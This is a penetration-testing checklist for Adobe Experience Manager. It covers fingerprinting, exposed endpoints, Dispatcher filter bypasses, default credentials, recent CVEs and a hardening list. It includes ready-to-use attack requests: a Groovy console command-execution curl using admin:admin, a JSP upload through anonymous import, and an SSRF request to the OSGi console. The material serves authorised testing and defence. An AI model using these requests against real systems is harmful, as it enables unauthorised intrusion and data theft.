AEM (Adobe Experience Manager) Pentesting



Adobe Experience Manager (AEM, part of Adobe Experience Cloud) is an enterprise CMS built on Apache Sling/Felix (OSGi) and the Java Content Repository (JCR). From an attacker's point of view, AEM instances frequently expose development endpoints, weak Dispatcher rules, default credentials and a long list of CVEs that get patched every quarter.

The checklist below focuses on the externally reachable (unauthenticated) attack surface that keeps showing up in real engagements (2022-2025).


1. Fingerprinting

```bash
$ curl -s -I https://target
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by the AEM Dispatcher
X-Vary: Accept-Encoding
```

Other quick indicators:

  • /etc.clientlibs/ static path is reachable (returns JS/CSS).
  • /libs/granite/core/content/login.html login page carries the "Adobe Experience Manager" banner.
  • </script><!--/* CQ */--> comment near the bottom of the HTML.

2. High-value unauthenticated endpoints

| Path | What you get | Notes |
|---|---|---|
| /.json, /.1.json | JCR nodes via DefaultGetServlet | Usually blocked, but the Dispatcher bypass (see below) often works. |
| /bin/querybuilder.json?path=/ | QueryBuilder API | Leaks the page tree, internal paths, usernames. |
| /system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 by default; if exposed and credentials are obtained ⇒ bundle-upload RCE. |
| /crx/packmgr/index.jsp | Package Manager | Accepts authenticated content packages → upload a JSP payload. |
| /etc/groovyconsole/** | AEM Groovy Console | If exposed → unrestricted Groovy / Java execution. |
| /libs/cq/AuditlogSearchServlet.json | Audit logs | Information disclosure. |
| /libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |

Dispatcher bypass

Most production sites sit behind the Dispatcher (reverse proxy). Its filter rules can often be bypassed by appending a static-looking suffix after a semicolon or an encoded newline: the Dispatcher matches the harmless extension, while Sling still resolves the original resource:

```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```

A single request like the one above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness.


3. Common misconfigurations (still going strong in 2025)

  1. Anonymous POST servlet – POST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it.
  2. World-readable user profiles – the default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Default credentials – admin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed – remote code execution by sending a Groovy script:
```bash
curl -u admin:admin --data-urlencode 'script=println "id".execute().text' https://target/bin/groovyconsole/post.json
```

4. Recent CVEs (service-pack cycle)

| Quarter | CVE | Affected | Impact |
|---|---|---|---|
| Dec 2024 | CVE-2024-43711 | 6.5.21 and earlier | Improper input validation → arbitrary code execution (requires low-privilege auth). |
| Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / stored XSS in the Move Page Wizard. |
| Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |
| Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-privilege creds). |

Always check the APSB bulletin matching the customer's service pack and recommend the latest release (6.5.22 or Cloud Service 2024.11 at the time of writing).


5. Exploitation snippets

5.1 RCE via Dispatcher bypass + JSP upload

If anonymous write is possible:

```http
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```

Now request /content/evil.jsp. If it executes, the JSP runs as the AEM process user. Caveat: Sling only executes scripts it resolves through script resolution (a path under a search path such as /apps or /libs, or a script bound to a resource type), so a node dropped under /content may come back as raw source instead of output; compare the response against the marker you printed versus the literal <% ... %> to tell the two apart, and fall back to the Package Manager or the OSGi console upload if you hold credentials.

5.2 SSRF to RCE (historic, < 6.3)

```http
GET /libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console HTTP/1.1
```

aem_ssrf2rce.py from aem-hacker automates the whole chain.


6. Tools

  • aem-hacker – Swiss-army enumeration script: Dispatcher bypass, SSRF detection, default-credential checks and more.
```bash
python3 aem_hacker.py -u https://target --host attacker-ip
```
  • Content brute-force – repeatedly request /_jcr_content.(json|html) to discover hidden components.
  • osgi-infect – upload a malicious OSGi bundle via /system/console/bundles when credentials are available.

7. Hardening checklist (for the recommendations in your report)

  1. Keep the instance on the latest service pack (as of July 2025: 6.5.22).
  2. Remove or rotate the default accounts; enforce SSO/SAML.
  3. Tighten the Dispatcher filters – deny ;, encoded newlines, and *.json or *.querybuilder.json for anonymous users.
  4. Disable or protect the consoles (/system/console, /crx/*, /etc/groovyconsole) with IP allow-lists.
  5. Apply the Anonymous Permission Hardening package released by Adobe.

References

  • Adobe Security Bulletin APSB24-69 – "Security updates available for Adobe Experience Manager (December 2024)".
  • 0ang3el – aem-hacker tool (GitHub).
